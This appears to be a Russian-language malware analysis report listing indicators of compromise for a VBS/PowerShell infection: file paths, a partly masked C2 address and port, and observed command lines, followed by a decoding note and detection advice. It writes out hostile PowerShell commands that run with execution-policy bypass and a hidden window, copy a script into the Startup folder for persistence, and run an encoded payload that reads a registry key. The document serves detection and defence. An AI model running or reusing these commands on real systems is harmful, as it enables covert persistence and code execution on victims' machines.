Техническая информация
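- %APPDATA%\microsoft\windows\start menu\programs\startup\dllhost.vbs (файл в папке автозагрузки пользователя; судя по команде Copy-Item ниже, это копия %TEMP%\xscv.vbs, которая обеспечивает запуск при входе в систему)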
- %TEMP%\xscv.vbs
- '84.##.52.166':12 (сетевой адрес и порт; один октет адреса скрыт в источнике символами ##)
- '<SYSTEM32>\wscript.exe' "%TEMP%\xscv.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\xscv.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.vbs';
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%TEMP%\xscv.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\dllhost.vbs';' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABkAGwAbABoAG8AcwB0AFwAKQAuAGQAbABsAGgAbwBzA...' (со скрытым окном)
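- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABkAGwAbABoAG8AcwB0AFwAKQAuAGQAbABsAGgAbwBzA...

Примечание к командам PowerShell: -exec bypass и -window 1 — сокращённые формы параметров -ExecutionPolicy Bypass и -WindowStyle со значением 1 (Hidden), что согласуется с пометкой «со скрытым окном». Аргумент -enc — это команда в Base64 (UTF-16LE); её видимая часть декодируется как ` $text = ((Get-ItemProperty HKCU:\Software\dllhost\).dllhos…`, то есть сценарий читает значение из раздела реестра HKCU\Software\dllhost. Строка в источнике обрезана, поэтому дальнейшие действия команды по этой странице установить нельзя. При проверке системы стоит искать этот раздел реестра, файл dllhost.vbs в папке автозагрузки и запуски powershell.exe с такими параметрами командной строки.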